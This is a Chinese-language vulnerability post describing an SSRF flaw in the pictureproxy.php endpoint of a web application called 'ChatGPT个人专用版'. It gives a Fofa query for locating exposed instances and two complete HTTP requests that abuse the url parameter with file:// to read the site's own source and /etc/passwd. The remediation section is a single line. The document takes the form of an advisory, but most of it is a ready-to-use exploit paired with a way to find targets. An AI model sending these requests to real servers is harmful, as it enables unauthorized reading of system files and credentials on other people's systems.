ChatGPT个人专用版 pictureproxy.php SSRF漏洞

0x01 漏洞描述:

ChatGPT个人专用版是一种基于人工智能的对话系统,旨在为用户提供个性化的交流体验。它能够理解和生成自然语言,帮助用户解决问题、获取信息或进行创意交流。通过不断学习和优化,ChatGPT个人专用版可以更好地适应用户的需求和偏好,提供更为精准和贴心的服务。其接口pictureproxy.php存在SSRF漏洞,攻击者可通过该漏洞获取系统敏感文件信息。

0x02 搜索语句:

Fofa:title="ChatGPT个人专用版"

0x03 漏洞复现:

宝塔服务网站:

复制代码
GET /pictureproxy.php?url=file:www/wwwroot/网站路径/pictureproxy.php HTTP/1.1
Host:your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

linux服务网站

复制代码
GET /pictureproxy.php?url=file:///etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/41.0.887 Safari/532.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Connection: close

0x04 修复建议:

官方已更新补丁,请即时修复。

相关推荐
mooyuan天天5 小时前
MySQL数据库UDF提权+Find提权渗透实战(Raven2靶机)
web安全·udf提权·phpmailer·raven2
Xudde.6 小时前
BabyPass靶机渗透
笔记·学习·安全·web安全
像风没有归宿a7 小时前
2024年全球网络安全威胁报告:AI攻击与勒索软件新变种
人工智能·安全·web安全
独行soc10 小时前
2025年渗透测试面试题总结-273(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
独行soc10 小时前
2025年渗透测试面试题总结-274(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
vortex513 小时前
渗透测试红队快速打点策略的思考
网络·安全·web安全
眠晚晚14 小时前
云上攻防-Docker-堡垒机安全详解
安全·web安全·网络安全·docker·容器
梦想是红队的咸鱼15 小时前
git泄露(一篇文章就够了)
git·web安全
xing.yu.CTF15 小时前
ATT&CK实战系列--蓝队防御(三)
网络·安全·web安全·横向移动·内网对抗